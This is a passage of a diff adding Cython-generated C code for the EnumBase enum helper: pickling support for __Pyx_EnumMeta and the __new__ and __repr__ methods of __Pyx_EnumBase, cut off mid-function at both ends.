0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_238750788); + __Pyx_GIVEREF(__pyx_int_238750788); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_238750788); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle___Pyx_EnumMeta__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_1__new__ = {"__new__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_cls = 0; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_name = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__new__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_cls,&__pyx_n_s_value,&__pyx_n_s_name,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject *)Py_None)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_cls)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, 1); __PYX_ERR(1, 28, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__new__") < 0)) __PYX_ERR(1, 28, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_cls = values[0]; + __pyx_v_value = values[1]; + __pyx_v_name = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 28, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(__pyx_self, __pyx_v_cls, __pyx_v_value, __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name) { + PyObject *__pyx_v_v = NULL; + PyObject *__pyx_v_res = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__new__", 0); + + /* "EnumBase":29 + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_cls)) || PyTuple_CheckExact(__pyx_v_cls)) { + __pyx_t_1 = __pyx_v_cls; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_cls); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 29, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 29, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 29, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 29, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_v, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumBase":30 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * if name is None: + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_v, __pyx_v_value, Py_EQ); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 30, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(1, 30, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_5) { + + /* "EnumBase":31 + * for v in cls: + * if v == value: + * return v # <<<<<<<<<<<<<< + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_v); + __pyx_r = __pyx_v_v; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":30 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * if name is None: + */ + } + + /* "EnumBase":29 + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":32 + * if v == value: + * return v + * if name is None: # <<<<<<<<<<<<<< + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + */ + __pyx_t_5 = (__pyx_v_name == Py_None); + if (unlikely(__pyx_t_5)) { + + /* "EnumBase":33 + * return v + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) # <<<<<<<<<<<<<< + * res = int.__new__(cls, value) + * res.name = name + */ + __pyx_t_1 = __Pyx_PyString_FormatSafe(__pyx_kp_s_Unknown_enum_value_s, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 33, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_builtin_ValueError, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 33, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 33, __pyx_L1_error) + + /* "EnumBase":32 + * if v == value: + * return v + * if name is None: # <<<<<<<<<<<<<< + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + */ + } + + /* "EnumBase":34 + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) # <<<<<<<<<<<<<< + * res.name = name + * setattr(cls, name, res) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyInt_Type)), __pyx_n_s_new); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_6, __pyx_v_cls, __pyx_v_value}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_res = __pyx_t_4; + __pyx_t_4 = 0; + + /* "EnumBase":35 + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + * res.name = name # <<<<<<<<<<<<<< + * setattr(cls, name, res) + * cls.__members__[name] = res + */ + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_v_name) < 0) __PYX_ERR(1, 35, __pyx_L1_error) + + /* "EnumBase":36 + * res = int.__new__(cls, value) + * res.name = name + * setattr(cls, name, res) # <<<<<<<<<<<<<< + * cls.__members__[name] = res + * return res + */ + __pyx_t_8 = PyObject_SetAttr(__pyx_v_cls, __pyx_v_name, __pyx_v_res); if (unlikely(__pyx_t_8 == ((int)-1))) __PYX_ERR(1, 36, __pyx_L1_error) + + /* "EnumBase":37 + * res.name = name + * setattr(cls, name, res) + * cls.__members__[name] = res # <<<<<<<<<<<<<< + * return res + * def __repr__(self): + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_cls, __pyx_n_s_members); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 37, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely((PyObject_SetItem(__pyx_t_4, __pyx_v_name, __pyx_v_res) < 0))) __PYX_ERR(1, 37, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":38 + * setattr(cls, name, res) + * cls.__members__[name] = res + * return res # <<<<<<<<<<<<<< + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_res); + __pyx_r = __pyx_v_res; + goto __pyx_L0; + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_v); + __Pyx_XDECREF(__pyx_v_res); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_3__repr__ = {"__repr__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 39, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__repr__") < 0)) __PYX_ERR(1, 39, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__repr__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 39, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "EnumBase":40 + * return res + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) # <<<<<<<<<<<<<< + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_self); + __Pyx_GIVEREF(__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_v_self); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s_d, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; 